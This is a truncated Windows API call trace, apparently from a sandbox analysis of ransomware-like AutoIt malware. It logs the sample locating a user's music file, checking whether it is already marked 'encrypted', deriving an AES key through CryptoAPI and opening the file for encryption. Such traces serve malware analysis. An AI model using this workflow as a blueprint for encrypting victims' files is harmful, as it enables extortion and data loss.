FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.365] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.365] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.365] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.366] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.366] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.366] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0xae3b6570, ftLastWriteTime.dwHighDateTime=0x1d5bfbd, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 0x7c20c0 [0038.366] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.366] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0xae3b6570, ftLastWriteTime.dwHighDateTime=0x1d5bfbd, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 0x7c20c0 [0038.366] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="65Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zb6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GvH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vH2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="opWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WaFb.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.368] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.368] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0xae3b6570, ftLastWriteTime.dwHighDateTime=0x1d5bfbd, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 0x7c2100 [0038.369] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.369] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.369] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.369] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.369] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0038.370] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.370] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.370] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.371] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.371] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.371] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.371] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.371] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0038.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.371] CryptDestroyHash (hHash=0x7c2240) returned 1 [0038.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s65zb6ggvh2opwafb.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.372] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.372] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.372] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, 